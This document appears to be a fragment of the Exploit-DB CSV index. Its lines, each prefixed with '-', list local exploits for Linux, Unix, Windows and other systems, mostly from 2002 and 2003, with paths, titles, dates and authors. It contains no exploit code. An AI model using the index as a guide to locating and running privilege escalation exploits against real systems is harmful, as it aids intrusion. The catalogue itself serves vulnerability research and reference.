-21762,exploits/linux/local/21762.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2)",2002-08-28,"David Endler",linux,local, -21763,exploits/linux/local/21763.txt,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3)",2002-08-28,syscalls,linux,local, -21771,exploits/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow / Privilege Escalation",2002-09-04,eSDee,unix,local, -21772,exploits/unix/local/21772.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (1)",2002-07-03,stripey,unix,local, -21773,exploits/unix/local/21773.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,unix,local, -21774,exploits/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 - _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,unix,local, -21781,exploits/windows/local/21781.c,"Trillian Instant Messaging 0.x - Credential Encryption",2002-09-09,"Coeus Group",windows,local, -21790,exploits/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ Authenticate Privilege Escalation",2002-06-28,"Charles Stevenson",unix,local, -21793,exploits/linux/local/21793.txt,"BRU 17.0 - XBRU Insecure Temporary File",2002-09-13,prophecy,linux,local, -21796,exploits/unix/local/21796.txt,"BubbleMon 1.x Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local, -21797,exploits/unix/local/21797.txt,"ASCPU 0.60 Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local, -21798,exploits/freebsd/local/21798.txt,"WMMon 1.0 b2 - Memory Character File Open File Descriptor Read",2002-09-16,badc0ded,freebsd,local, -21799,exploits/freebsd/local/21799.txt,"WMNet2 1.0 6 - Kernel Memory File Descriptor Leakage",2002-09-16,badc0ded,freebsd,local, -21805,exploits/unix/local/21805.c,"Cisco VPN 5000 Client - Buffer Overrun (1)",2002-09-18,BrainStorm,unix,local, -21806,exploits/unix/local/21806.c,"Cisco VPN 5000 Client - Buffer Overrun (2)",2002-09-18,zillion,unix,local, -21807,exploits/unix/local/21807.pl,"HP Tru64/OSF1 DXTerm - Local Buffer Overflow",2002-07-03,stripey,unix,local, -21814,exploits/linux/local/21814.c,"AlsaPlayer 0.99.71 - Local Buffer Overflow",2002-09-20,zillion,linux,local, -21815,exploits/osx/local/21815.txt,"Apple Mac OSX 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local, -21884,exploits/unix/local/21884.txt,"Sendmail 8.12.x - SMRSH Double Pipe Access Validation",2002-10-01,zen-parse,unix,local, -21881,exploits/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow",2002-09-30,stanojr@iserver.sk,bsd,local, -21831,exploits/windows/local/21831.c,"PLIB 1.8.5 - 'ssg/ssgParser.cxx' Local Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local, -21843,exploits/windows/local/21843.rb,"Microsoft Windows - Escalate UAC Execute RunAs (Metasploit)",2012-10-10,Metasploit,windows,local, -21844,exploits/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)",2012-10-10,Metasploit,windows,local, -21845,exploits/windows/local/21845.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Metasploit)",2012-10-10,Metasploit,windows,local, -21848,exploits/linux/local/21848.rb,"Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)",2012-10-10,Metasploit,linux,local, -21856,exploits/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification",2002-09-25,"Mike Riley",multiple,local, -21865,exploits/linux/local/21865.c,"Interbase 5/6 - GDS_Lock_MGR UMask File Permission Changing",2002-09-25,grazer,linux,local, -21871,exploits/linux/local/21871.c,"GV 2.x/3.x - '.PDF'/'.PS' File Buffer Overflow (1)",2002-09-26,zen-parse,linux,local, -21872,exploits/linux/local/21872.c,"GV 2.x/3.x - '.PDF'/'.PS' File Buffer Overflow (2)",2002-09-26,infamous42md,linux,local, -21887,exploits/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink",2012-10-11,fb1h2s,windows,local, -21892,exploits/windows/local/21892.txt,"FileBound 6.2 - Local Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local, -21904,exploits/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow",2003-04-16,watercloud,aix,local, -21922,exploits/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local, -21923,exploits/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local, -21980,exploits/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local, -21988,exploits/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode (SEH)",2012-10-15,Dark-Puzzle,windows,local, -21994,exploits/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,windows,local, -22002,exploits/linux/local/22002.txt,"QNX RTOS 6.2 - Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,linux,local, -22014,exploits/linux/local/22014.c,"Traceroute-nanog 6 - Local Buffer Overflow",2002-11-12,"Carl Livitt",linux,local, -22055,exploits/linux/local/22055.txt,"SUIDPerl 5.6 - Information Disclosure",2002-11-29,zen-parse,linux,local, -22066,exploits/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local, -22067,exploits/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local, -22069,exploits/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local, -22120,exploits/solaris/local/22120.c,"Sun Solaris 2.5.1/2.6/7.0/8/9 Wall - Spoofed Message Origin",2003-01-03,"Brant Roman",solaris,local, -22128,exploits/linux/local/22128.c,"H-Sphere WebShell 2.4 - Local Privilege Escalation",2003-01-06,"Carl Livitt",linux,local, -22189,exploits/linux/local/22189.txt,"MTink 0.9.x - Printer Status Monitor Environment Variable Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local, -22190,exploits/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local, -22193,exploits/windows/local/22193.txt,"WinRAR 2.90/3.0/3.10 - Archive File Extension Buffer Overrun",2003-01-22,nesumin,windows,local, -22203,exploits/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command - Arbitrary File Deletion",2003-01-27,"Wojciech Purczynski",solaris,local, -22210,exploits/openbsd/local/22210.txt,"OpenBSD 2.x/3.x - CHPass Temporary File Link File Content Revealing",2003-02-03,"Marc Bevand",openbsd,local, -22212,exploits/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local, -22225,exploits/windows/local/22225.txt,"Microsoft Windows XP - Redirector Privilege Escalation",2003-02-05,Nsfocus,windows,local, -22231,exploits/hp-ux/local/22231.txt,"HPUX 10.20/11 Wall Message - Local Buffer Overflow",2003-02-07,Scotty,hp-ux,local, -22233,exploits/linux/local/22233.c,"Nethack 3 - Local Buffer Overflow (1)",2003-02-10,tsao@efnet,linux,local, -22234,exploits/linux/local/22234.c,"Nethack 3 - Local Buffer Overflow (2)",2003-02-10,bob@dtors.net,linux,local, -22235,exploits/linux/local/22235.pl,"Nethack 3 - Local Buffer Overflow (3)",2003-02-10,tsao@efnet,linux,local, -22246,exploits/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local, -22247,exploits/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local, -22248,exploits/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local, -22265,exploits/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Local Privilege Escalation",2003-02-19,deadbeat,linux,local, -22272,exploits/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local, -22332,exploits/unix/local/22332.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local, -22331,exploits/unix/local/22331.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local, -22320,exploits/linux/local/22320.c,"XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local, -22321,exploits/linux/local/22321.c,"XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (2)",2003-03-03,"Guilecool & deka",linux,local, -22322,exploits/linux/local/22322.c,"XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (3)",2003-03-03,omega,linux,local, -22323,exploits/linux/local/22323.c,"XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (4)",2003-03-03,axis,linux,local, -22324,exploits/unix/local/22324.c,"File 3.x - Local Stack Overflow Code Execution (1)",2003-03-04,lem0n,unix,local, -22325,exploits/unix/local/22325.c,"File 3.x - Local Stack Overflow Code Execution (2)",2003-03-04,lem0nxx,unix,local, -22326,exploits/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,linux,local, -22329,exploits/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local, -22335,exploits/unix/local/22335.pl,"Tower Toppler 0.99.1 - 'Display' Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local, -22340,exploits/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Local Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local, -22344,exploits/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local, -22354,exploits/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow",2003-03-09,s0h,windows,local, -22362,exploits/linux/local/22362.c,"Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local, -22363,exploits/linux/local/22363.c,"Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2)",2003-04-10,"Wojciech Purczynski",linux,local, -22376,exploits/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local, -22442,exploits/unix/local/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,local, -22452,exploits/linux/local/22452.sh,"ChiTeX 6.1.2 - Local Privilege Escalation",2003-04-03,zillion,linux,local, -22456,exploits/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 - Symbolic Link Following Configuration File",2003-04-03,"Carl Livitt",linux,local, -22458,exploits/linux/local/22458.c,"Linux Kernel 2.2.x/2.4.x - I/O System Call File Existence",2003-04-04,"Andrew Griffiths",linux,local, -22465,exploits/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 - Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local, -22528,exploits/windows/local/22528.c,"Microsoft Windows Server 2000 - 'RegEdit.exe' Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local, -22531,exploits/linux/local/22531.pl,"SAP Database 7.3/7.4 - SDBINST Race Condition",2003-04-23,"Larry W. Cashdollar",linux,local, -22538,exploits/linux/local/22538.pl,"Libopt.a 3.1x - Error Logging Buffer Overflow (2)",2003-04-24,jlanthea,linux,local, -22540,exploits/linux/local/22540.c,"Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow",2003-02-18,"Angelo Rosiello",linux,local, -22564,exploits/windows/local/22564.c,"FlashFXP 1.4 - User Password Encryption",2003-05-05,DVDMAN,windows,local, -22565,exploits/linux/local/22565.c,"MySQL 3.x/4.0.x - Weak Password Encryption",2003-05-05,"Secret Squirrel",linux,local, -22566,exploits/freebsd/local/22566.pl,"Youbin 2.5/3.0/3.4 - HOME Buffer Overflow",2003-05-06,"Knud Erik Hojgaard",freebsd,local, -22567,exploits/linux/local/22567.c,"Leksbot 1.2 - Multiple Vulnerabilities",2003-05-06,gunzip,linux,local, -22573,exploits/freebsd/local/22573.pl,"ListProc 8.2.9 - Catmail ULISTPROC_UMASK Buffer Overflow",2003-05-08,kf,freebsd,local, -22574,exploits/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption",2003-05-09,"Knud Erik Hojgaard",freebsd,local, -22580,exploits/freebsd/local/22580.c,"Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow",2003-05-10,bob,freebsd,local, -22594,exploits/linux/local/22594.c,"CDRTools CDRecord 1.11/2.0 - Devname Format String",2003-05-13,CMN,linux,local, -22613,exploits/freebsd/local/22613.pl,"Maelstrom Server 3.0.x - Argument Buffer Overflow (1)",2003-05-20,"Luca Ercoli",freebsd,local, -22614,exploits/freebsd/local/22614.c,"Maelstrom Server 3.0.x - Argument Buffer Overflow (2)",2003-05-23,ph4nt0m,freebsd,local, -22615,exploits/freebsd/local/22615.c,"Maelstrom Server 3.0.x - Argument Buffer Overflow (3)",2003-05-20,CMN,freebsd,local, -22616,exploits/linux/local/22616.pl,"Maelstrom Player 3.0.x - Argument Buffer Overflow (1)",2003-05-21,"Luca Ercoli",linux,local, -22617,exploits/linux/local/22617.c,"Maelstrom Player 3.0.x - Argument Buffer Overflow (2)",2003-05-20,knight420,linux,local, -22628,exploits/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution",2003-03-20,"Tomasz Grabowski",multiple,local, -22633,exploits/linux/local/22633.c,"Polymorph 0.4 - Filename Buffer Overflow",2003-05-22,demz,linux,local, -22640,exploits/linux/local/22640.c,"UML_NET - Integer Mismanagement Code Execution",2003-05-23,ktha@hushmail.com,linux,local, -22643,exploits/linux/local/22643.pl,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (1)",2003-05-26,jlanthea,linux,local, -22644,exploits/linux/local/22644.c,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (2)",2003-05-26,jsk,linux,local, -22645,exploits/linux/local/22645.c,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (3)",2003-05-26,"Julien L",linux,local, -22652,exploits/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing",2012-11-12,"Julien Ahrens",windows,local, -22661,exploits/freebsd/local/22661.c,"Upclient 5.0 b7 - Command Line Argument Buffer Overflow",2003-05-27,"Gino Thomas",freebsd,local, -22683,exploits/linux/local/22683.pl,"HT Editor 2.0.20 - Local Buffer Overflow (ROP) (PoC)",2012-11-13,ZadYree,linux,local, -22695,exploits/linux/local/22695.pl,"RedHat 9.0 / Slackware 8.1 - '/bin/mail' Carbon Copy Field Buffer Overrun",2003-05-30,mark@vulndev.org,linux,local, -22703,exploits/linux/local/22703.c,"XMame 0.6x - Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",linux,local, -22719,exploits/linux/local/22719.pl,"kon2 - Local Buffer Overflow (1)",2003-06-03,wsxz,linux,local, -22720,exploits/linux/local/22720.c,"kon2 - Local Buffer Overflow (2)",2003-06-03,c0ntex,linux,local, -22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,multiple,local, -22729,exploits/linux/local/22729.c,"Man 1.5.1 - Catalog File Format String",2003-06-04,V9,linux,local, -22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",multiple,local, -22745,exploits/linux/local/22745.c,"Zblast 1.2 - 'Username' Local Buffer Overrun",2003-06-06,V9,linux,local, -22748,exploits/linux/local/22748.c,"Xaos 3.0 - Language Option Local Buffer Overflow",2003-06-06,bazarr@ziplip.com,linux,local, -40410,exploits/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,windows,local, -22756,exploits/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow",2003-06-01,watercloud,aix,local, -22768,exploits/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow",2003-06-06,"Julien LANTHEA",linux,local, -22773,exploits/linux/local/22773.c,"Progress Database 9.1 - Environment Variable Privilege Escalation",2003-06-14,kf,linux,local, -22775,exploits/linux/local/22775.txt,"FreeWnn 1.1.1 - JServer Logging Option Data Corruption",2003-06-14,"Stefano Di Paola",linux,local, -22779,exploits/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding",2003-06-16,"Noam Rathaus",windows,local, -22781,exploits/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",linux,local, -22806,exploits/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,linux,local, -22811,exploits/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local, -22813,exploits/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure",2003-06-20,IhaQueR,linux,local, -22815,exploits/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local, -40409,exploits/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local, -22835,exploits/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun",2003-06-24,posidron,windows,local, -22836,exploits/linux/local/22836.pl,"Elm 2.3/2.4 - TERM Environment Variable Local Buffer Overrun",1997-05-13,kokanin,linux,local, -22840,exploits/linux/local/22840.c,"Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,linux,local, -22847,exploits/linux/local/22847.txt,"InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions",2003-07-01,"Larry W. Cashdollar",linux,local, -22851,exploits/windows/local/22851.py,"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",windows,local, -22860,exploits/linux/local/22860.c,"GNU Chess 5.0 - Local Buffer Overflow",2003-07-03,ace,linux,local, -22861,exploits/linux/local/22861.c,"GNU AN - Command Line Option Local Buffer Overflow",2003-07-03,ace,linux,local, -22862,exploits/linux/local/22862.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (1)",2003-07-03,ace,linux,local, -22863,exploits/linux/local/22863.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (2)",2003-07-04,snooq,linux,local, -22870,exploits/windows/local/22870.txt,"Microsoft Windows XP/2000 - 'RunDLL32.exe' Local Buffer Overflow",2003-07-06,"Rick Patel",windows,local, -23037,exploits/windows/local/23037.txt,"DWebPro 3.4.1 - Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local, -22882,exploits/windows/local/22882.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,windows,local, -22883,exploits/windows/local/22883.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)",2003-07-08,Maceo,windows,local, -22884,exploits/linux/local/22884.c,"Tower Toppler 0.96 - 'HOME Environment' Local Buffer Overflow",2003-07-08,FBHowns,linux,local, -22911,exploits/php/local/22911.php,"PHP 4.3.x - Undefined Safe_Mode_Include_Dir Safemode Bypass",2003-07-16,"Michal Krause",php,local, -22912,exploits/unix/local/22912.txt,"IBM UniVerse 10.0.0.9 - 'uvadmsh' Local Privilege Escalation",2003-07-16,kf,unix,local, -22943,exploits/linux/local/22943.c,"Top 1.x/2.0 - 'HOME Environment' Local Buffer Overflow",2003-07-22,UHAGr,linux,local, -22946,exploits/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 - Plain Text Password",2003-07-22,hanez,windows,local, -22965,exploits/linux/local/22965.c,"XBlast 2.6.1 - 'HOME Environment' Local Buffer Overflow",2003-07-28,c0wboy,linux,local, -22923,exploits/unix/local/22923.c,"Tolis Group BRU 17.0 - Local Privilege Escalation (1)",2003-07-16,DVDMAN,unix,local, -22924,exploits/unix/local/22924.c,"Tolis Group BRU 17.0 - Local Privilege Escalation (2)",2003-07-16,nic,unix,local, -22928,exploits/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local, -22931,exploits/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Direct RETN",2012-11-26,Nezim,windows,local, -22932,exploits/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn",2012-11-26,Nezim,windows,local, -23007,exploits/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI (Metasploit)",2012-11-29,Metasploit,windows,local, -22939,exploits/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow",2003-07-21,inv[at]dtors,unix,local, -22971,exploits/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow",2003-07-29,V9,linux,local, -22979,exploits/linux/local/22979.txt,"CDRTools 2.0 - RSCSI Debug File Arbitrary Local File Manipulation",2003-08-01,"Secure Network Operations",linux,local, -22980,exploits/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local, -22984,exploits/linux/local/22984.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (1)",2003-08-04,V9,linux,local, -22985,exploits/linux/local/22985.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (2)",2003-08-04,techieone@softhome.net,linux,local, -22988,exploits/unix/local/22988.sh,"IBM DB2 db2job - File Overwrite",2003-08-05,"Juan Manuel Pascual Escribá",unix,local, -22989,exploits/unix/local/22989.pl,"IBM DB2 - Shared Library Injection",2003-08-05,daniels@legend.co.uk,unix,local, -22993,exploits/linux/local/22993.txt,"IPNetSentryX / IPNetMonitorX - Unauthorized Network Reconnaissance",2003-07-07,@stake,linux,local, -22996,exploits/linux/local/22996.c,"XPCD 2.0.8 - 'HOME Environment' Local Buffer Overflow",2003-07-18,r-code,linux,local, -23022,exploits/php/local/23022.c,"PHP 4.x - DLOpen Memory Disclosure (1)",2003-08-13,"Andrew Griffiths",php,local, -23023,exploits/php/local/23023.c,"PHP 4.x - DLOpen Memory Disclosure (2)",2003-08-13,andrewg,php,local, -23041,exploits/windows/local/23041.txt,"DeskSoft CheckMail 1.2 - Password Disclosure",2003-08-19,"cyber talon",windows,local, -23045,exploits/linux/local/23045.pl,"ViRobot Linux Server 2.0 - Local Overflow",2003-08-20,kf,linux,local, -23046,exploits/openbsd/local/23046.c,"OpenBSD 3.3 - 'Semget()' Integer Overflow (1)",2003-08-20,blexim,openbsd,local, -23047,exploits/openbsd/local/23047.c,"OpenBSD 3.3 - 'Semget()' Integer Overflow (2)",2003-08-20,blexim,openbsd,local, -23052,exploits/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling (Metasploit)",2012-12-01,Metasploit,windows,local, -23062,exploits/bsd/local/23062.c,"BSD-Games 2.x - Monop Player Name Local Buffer Overrun (1)",2003-08-25,^sq,bsd,local, -23063,exploits/bsd/local/23063.c,"BSD-Games 2.x - Monop Player Name Local Buffer Overrun (2)",2003-08-25,N4rK07IX,bsd,local, -23077,exploits/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Escalation",2012-12-02,kingcope,linux,local, -23096,exploits/windows/local/23096.txt,"Microsoft WordPerfect - Converter Buffer Overrun",2003-09-03,valgasu,windows,local, -23119,exploits/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation",2003-09-09,"Jon Hart",linux,local, -23126,exploits/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",linux,local, -23141,exploits/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' 'REMOTE_ADDR' Authentication Bypass",2003-09-15,Texonet,sco,local, -23143,exploits/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local, -23154,exploits/linux/local/23154.c,"Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",linux,local, -23168,exploits/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Escalation",2003-09-22,"Sebastian Krahmer",linux,local, -23189,exploits/linux/local/23189.c,"marbles 1.0.1 - Local Home Environment Variable Buffer Overflow",2003-09-26,demz,linux,local, -23197,exploits/linux/local/23197.c,"Mah-Jong 1.4 - MJ-Player Server Flag Local Buffer Overflow",2003-09-29,jsk,linux,local, -23204,exploits/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun",2003-09-30,demz,linux,local, -23210,exploits/windows/local/23210.c,"Microsoft Windows XP/2000 - PostThreadMessage() Arbitrary Process Killing",2003-10-02,"Brett Moore",windows,local, -23223,exploits/linux/local/23223.c,"SuSE Linux Professional 8.2 - SuSEWM Configuration File Insecure Temporary File",2003-10-06,"Nash Leon",linux,local, -23228,exploits/linux/local/23228.c,"SLocate 2.6 - User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",linux,local, -23251,exploits/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Privilege Escalation",2012-12-09,"Larry W. Cashdollar",linux,local, -23255,exploits/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control - 'User32.dll' Buffer Overrun",2003-10-15,"Brett Moore",windows,local, -23258,exploits/linux/local/23258.c,"Oracle Database Server 9.0.x - Oracle Binary Local Buffer Overflow",2003-10-17,c0ntex,linux,local, -23297,exploits/linux/local/23297.c,"Musicqueue 1.2 - SIGSEGV Signal Handler Insecure File Creation",2003-10-27,"dong-h0un U",linux,local, -23299,exploits/linux/local/23299.c,"Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)",2003-10-27,axis,linux,local, -23300,exploits/linux/local/23300.c,"Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2)",2003-11-11,heka,linux,local, -23301,exploits/linux/local/23301.c,"Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3)",2003-10-27,NrAziz,linux,local, -23303,exploits/linux/local/23303.c,"Musicqueue 0.9/1.0/1.1 - Multiple Buffer Overrun Vulnerabilities",2003-10-27,"dong-h0un U",linux,local, -23308,exploits/linux/local/23308.c,"kpopup 0.9.x - Privileged Command Execution",2003-10-28,b0f,linux,local, -23327,exploits/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 - Unauthorized Access",2003-11-01,t4rku5,windows,local, -23341,exploits/hp-ux/local/23341.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (1)",2003-04-01,watercloud,hp-ux,local, -23342,exploits/hp-ux/local/23342.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (2)",2003-04-01,watercloud,hp-ux,local, -23343,exploits/hp-ux/local/23343.c,"HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun",2002-12-11,watercloud,hp-ux,local, -23344,exploits/linux/local/23344.txt,"IBM DB2 - 'db2start' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local, -23345,exploits/linux/local/23345.txt,"IBM DB2 - 'db2stop' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local, -23346,exploits/linux/local/23346.txt,"IBM DB2 - 'db2govd' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local, -23350,exploits/linux/local/23350.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,linux,local, -23351,exploits/linux/local/23351.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,linux,local, -23352,exploits/linux/local/23352.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",linux,local, -23364,exploits/linux/local/23364.sh,"WMAPM 3.1 - Local Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local, -23414,exploits/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local, -23479,exploits/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local, -23481,exploits/linux/local/23481.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local, -23482,exploits/linux/local/23482.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local, 